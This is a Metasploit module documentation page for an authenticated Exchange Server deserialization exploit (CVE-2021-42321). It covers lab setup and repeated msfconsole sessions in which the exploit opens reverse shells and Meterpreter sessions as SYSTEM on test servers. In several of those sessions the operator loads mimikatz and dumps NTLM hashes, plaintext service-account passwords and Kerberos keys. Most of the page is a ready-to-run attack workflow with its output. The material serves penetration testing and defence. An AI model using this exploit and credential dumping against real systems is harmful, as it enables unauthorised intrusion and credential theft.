Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE - Metasploit
This page contains detailed information about how to use the exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Verification Steps
- Targets
- Options
- Scenarios
- Exchange Server 2016 CU22 SU0 On Windows Server 2016
- Target 0 - Windows Command
- Target 1 - Windows Dropper
- Target 2 - PowerShell Stager
- Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches
- Target 0 - Windows Command
- Target 1 - Windows Dropper
- Target 2 - PowerShell Stager
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE
Module: exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
Source code: modules/exploits/windows/http/exchange_chainedserializationbinder_denylist_typo_rce.rb
Disclosure date: 2021-12-09
Last modification time: 2022-03-17 09:56:51 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-42321
This vulnerability allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2. Note that authentication is required to exploit this vulnerability. The specific flaw exists due to the fact that the deny list for the ChainedSerializationBinder had a typo whereby an entry was typo'd as System.Security.ClaimsPrincipal instead of the proper value of System.Security.Claims.ClaimsPrincipal. By leveraging this vulnerability, attacks can bypass the ChainedSerializationBinder's deserialization deny list and execute code as NT AUTHORITY\SYSTEM. Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
msf > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
msf exploit(exchange_chainedserializationbinder_denylist_typo_rce) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Description
This vulnerability allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2.
Note that authentication is required to exploit this vulnerability.
The specific flaw exists due to the fact that the deny list for the
ChainedSerializationBinder had a typo whereby an entry was typo'd as
System.Security.ClaimsPrincipal
instead of the proper value of
System.Security.Claims.ClaimsPrincipal
.
By leveraging this vulnerability, attacks can bypass the
ChainedSerializationBinder
's deserialization deny list
and execute code as NT AUTHORITY\SYSTEM
.
Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server 2016.
Setup
- Set up a version of Windows Server 2019.
- Download Exchange Server 2019 CU11 SU0 from https://download.microsoft.com/download/5/3/e/53e75dbd-ca33-496a-bd23-1d861feaa02a/ExchangeServer2019-x64-CU11.ISO
- Follow the guide at https://petri.com/how-to-install-active-directory-in-windows-server-2019-server-manager to turn the server into an AD server.
- Mount the ISO and run
Setup.exe
. It should prompt you install .NET Framework, Visual Studio C++ Redistributables, and Unified Communications Managed API. Install these and then reboot. - Follow https://www.nucleustechnologies.com/blog/step-by-step-guide-to-install-exchange-server-2019-part-1/ and install the required features.
- Keep running
Setup.exe
and installing extra dependencies as needed as per the links. - When you do get all dependencies installed, Exchange should give a button called
Install
which should no longer be greyed out. Press this to install and accept any warnings that appear. - Go to https://ip here/owa/ and make sure you can see the Exchange Outlook login page.
Verification Steps
- Follow Setup to set up a vulnerable target.
msfconsole
set RHOST <target IP address>
set LHOST <IP for target to connect back to>
set HttpUsername <username of OWA user to log in as>
set HttpPassword <password for this OWA user>
- Optional:
set DOMAIN <domain of OWA user>
- Optional:
set VHOST <vhost of target>
exploit
- You should get a shell on the target as
NT AUTHORITY\SYSTEM
if it is vulnerable.
Targets
0
Windows Command
1
Windows Dropper
2
PowerShell Stager
Options
HttpUsername
Set this to the OWA username. This can also be set to a valid domain username that has permissions to log into Exchange.
HttpPassword
Set this to the OWA password. This can also be set to the password for a domain user that has permissions to log into Exchange.
Scenarios
Exchange Server 2016 CU22 SU0 On Windows Server 2016
Target 0 - Windows Command
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.24.104.104 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.24.97.166 yes The listen address (an interface may be speci
fied)
LOAD_MODULES no A list of powershell modules separated by a c
omma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started reverse TCP handler on 172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs7u
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (172.24.97.166:4444 -> 172.24.104.104:8404 ) at 2022-02-22 17:27:02 -0600
PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv>
Target 1 - Windows Dropper
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 1
target => 1
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.24.104.104 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proc
ess, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.24.97.166 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
1 Windows Dropper
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Using URL: http://0.0.0.0:8080/7nZtWqPZw3Oz
[*] Local IP: http://172.24.97.166:8080/7nZtWqPZw3Oz
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs72
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Command Stager progress - 100.00% done (151/151 bytes)
[*] Client 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576) requested /7nZtWqPZw3Oz
[*] Sending payload to 172.24.104.104 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.576)
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Redirecting stageless connection from /886ARUzXt2EUshWwdqdmVAWJyxlofzHG with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15'
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Attaching orphaned/stageless session...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: gj6ikxqy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:34:07 -0600
[*] Server stopped.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator TESTINGDOMAIN2 373b765d01cd8aefe 220cface685ef2b97 968811261fcbaff0d
a318e3843980454 a998f965b0d9b996b 2d5c4c8e546ba87
55d560
EXCHG-2016$ TESTINGDOMAIN2 f03d9a521cfd7eed6 ab32f2765ba2a3a3c
51c0ce1b0298d82 914aa472be639b241
21e69c
HealthMailbox2e9 TESTINGDOMAIN2 c1ab4c2b030aa3759 363c5d7a09080cd07 4e9729bc7336ca551
0d89 a4790cf6c78c642 d85c7ebacafd4ccb4 0624e08feaef9eb
70c944
ssp credentials
===============
Username Domain Password
-------- ------ --------
HealthMailbox2e90d89fe61a419 (null) LWjz0zSYg$YiYf2r{e-24zpAr)[email protected])Iq)h!49{6w(i_/_-3^%{
ba6c0942480b9c30e@testingdom K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
ain.internal G81r@gX$q9RGGFa7s@$B3IdYxz
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN2 (null)
EXCHG-2016$ TESTINGDOMAIN2 (null)
HealthMailbox2e90d89 TESTINGDOMAIN2 (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN.INTERNAL (null)
EXCHG-2016$ testingdomain.internal ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
7 f3 0c 27 df 31 5d 33 e3 32 e9
HealthMailbox2e90d89 TESTINGDOMAIN.INTERNAL (null)
exchg-2016$ TESTINGDOMAIN.INTERNAL (null)
meterpreter >
Target 2 - PowerShell Stager
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOSTS 172.24.104.104
RHOSTS => 172.24.104.104
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.24.97.166
LHOST => 172.24.97.166
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set target 2
target => 2
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.24.104.104 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces
s, none)
LHOST 172.24.97.166 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 PowerShell Stager
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.24.97.166:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.1.2375.7 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAABjPvjo3ZQTRrRX7vZy33WTAAAADs76
[+] ID value for Inbox folder is AQMkADM5MTA3MzQ3LTQyZjYtNGQyMy05YTdjLWY1ZWQwNDZmZDgwNQAuAAADkwyiNLXBI0qL2/WrTMzfsQEAYz746N2UE0a0V+72ct91kwAAAgEMAAAA
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
[*] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Staging x64 payload (201308 bytes) ...
[!] https://172.24.97.166:4444 handling request from 172.24.104.104; (UUID: jobjtqox) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.24.97.166:4444 -> 127.0.0.1 ) at 2022-02-22 17:37:56 -0600
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator TESTINGDOMAIN2 373b765d01cd8aefe 220cface685ef2b97 968811261fcbaff0d
a318e3843980454 a998f965b0d9b996b 2d5c4c8e546ba87
55d560
EXCHG-2016$ TESTINGDOMAIN2 f03d9a521cfd7eed6 ab32f2765ba2a3a3c
51c0ce1b0298d82 914aa472be639b241
21e69c
HealthMailbox2e9 TESTINGDOMAIN2 c1ab4c2b030aa3759 363c5d7a09080cd07 4e9729bc7336ca551
0d89 a4790cf6c78c642 d85c7ebacafd4ccb4 0624e08feaef9eb
70c944
ssp credentials
===============
Username Domain Password
-------- ------ --------
HealthMailbox2e90d89fe61a419 (null) LWjz0zSYg$YiYf2r{e-24zpAr)[email protected])Iq)h!49{6w(i_/_-3^%{
ba6c0942480b9c30e@testingdom K-Tpaf#d]Xefo.z}9.g6Qk(Ba@J&V)wH2h!X4a:eWO}_}ynh3n;
ain.internal G81r@gX$q9RGGFa7s@$B3IdYxz
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN2 (null)
EXCHG-2016$ TESTINGDOMAIN2 (null)
HealthMailbox2e90d89 TESTINGDOMAIN2 (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator TESTINGDOMAIN.INTERNAL (null)
EXCHG-2016$ testingdomain.internal ae 82 5d 5c e8 3a aa 57 91 23 b2 83 bb 27 6
1 43 ad d1 16 58 40 5f b8 0c 54 fa e8 42 6c
a8 57 23 9b 75 7d 33 a4 09 16 c1 f1 34 37
fc ec 10 b7 bd 41 03 45 c0 0c d4 26 91 8b e
4 d5 c7 43 98 be 91 80 fa fd ff 85 98 1b 49
82 c2 26 29 00 29 4e eb c2 e5 53 5f 09 f1
75 4b 3e 6d f0 ce 9a 4c b4 6e 60 c0 8f 2a d
e e0 31 df 2b a9 6a e7 e3 8a b7 3c 90 5a 9d
bc 39 6d 52 1a 3b 99 0a 10 b9 e0 fe b4 47
5e 46 af dc 32 70 43 aa dc 7f 74 67 5d 98 f
9 d6 b1 31 b8 00 5b 07 19 7f 84 d5 1d 71 2c
3c c6 ea 72 13 86 fe a7 8b 1b 1d 77 7c 62
d7 83 e7 d1 94 02 e8 3a 0c c1 c5 9b 47 19 f
b a8 21 69 47 d4 77 67 e2 30 9f 03 f8 23 3c
94 c6 68 32 15 1c 8f 94 2e 44 f7 3b 9e 69
ac 87 4f 5f 51 9a 21 d2 df b6 84 d6 93 21 f
7 f3 0c 27 df 31 5d 33 e3 32 e9
HealthMailbox2e90d89 TESTINGDOMAIN.INTERNAL (null)
exchg-2016$ TESTINGDOMAIN.INTERNAL (null)
meterpreter >
Exchange Server 2019 CU11 SU0 on Windows Server 2019 Fully Updated with February 2022 Patches
Target 0 - Windows Command
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.31.160.218 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.31.171.42 yes The listen address (an interface may be speci
fied)
LOAD_MODULES no A list of powershell modules separated by a c
omma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started reverse TCP handler on 172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7f
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Powershell session session 1 opened (172.31.171.42:4444 -> 172.31.160.218:30212 ) at 2022-02-14 18:01:56 -0600
PS C:\windows\system32\inetsrv> whoami
nt authority\system
PS C:\windows\system32\inetsrv> exit
[*] 172.31.160.218 - Powershell session session 1 closed. Reason: User exit
Target 1 - Windows Dropper
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set RHOST 172.31.160.218
RHOST => 172.31.160.218
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set LHOST 172.31.171.42
LHOST => 172.31.171.42
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpUsername administrator
HttpUsername => administrator
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set HttpPassword thePassword123!
HttpPassword => thePassword123!
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > set TARGET 1
TARGET => 1
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > show options
Module options (exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword thePassword123! yes The password to use to authenticate to the Ex
change server
HttpUsername administrator yes The username to log into the Exchange server
as
Proxies no A proxy chain of format type:host:port[,type:
host:port][...]
RHOSTS 172.31.160.218 yes The target host(s), see https://github.com/ra
pid7/metasploit-framework/wiki/Using-Metasplo
it
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen
on. This must be an address on the local mac
hine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is
randomly generated)
TARGETURI / yes Base path
URIPATH no The URI to use for this exploit (default is r
andom)
VHOST no HTTP server virtual host
Payload options (windows/x64/meterpreter_reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proc
ess, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.31.171.42 yes The local listener hostname
LPORT 4444 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
1 Windows Dropper
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) > exploit
[*] Started HTTPS reverse handler on https://172.31.171.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exchange Server 15.2.986.5 is a vulnerable build.
[*] Using URL: http://0.0.0.0:8080/QULKk6
[*] Local IP: http://172.31.171.42:8080/QULKk6
[*] Getting the user's inbox folder's ID and ChangeKey ID...
[+] ChangeKey value for Inbox folder is AQAAABYAAAD+NAPdfxHOQog5PRD09yZZAAADvk7o
[+] ID value for Inbox folder is AQMkADk4Nzg3MTk4LTdmMWItNDIwOC1hNjYAZC1hMDU4ZWYyMGEyNDYALgAAA63xDZKmFz1AgDziIaoT/0sBAP40A91/Ec5CiDk9EPT3JlkAAAIBDAAAAA==
[*] Deleting the user configuration object associated with Inbox folder...
[+] Successfully deleted the user configuration object associated with the Inbox folder!
[*] Creating the malicious user configuration object on the Inbox folder!
[+] Successfully created the malicious user configuration object and associated with the Inbox folder!
[*] Attempting to deserialize the user configuration object using a GetClientAccessToken request...
[*] Client 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268) requested /QULKk6
[*] Sending payload to 172.31.160.218 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.2268)
[*] Command Stager progress - 100.00% done (145/145 bytes)
[!] https://172.31.171.42:4444 handling request from 172.31.160.218; (UUID: 7hftmkuo) Without a database connected that payload UUID tracking will not work!
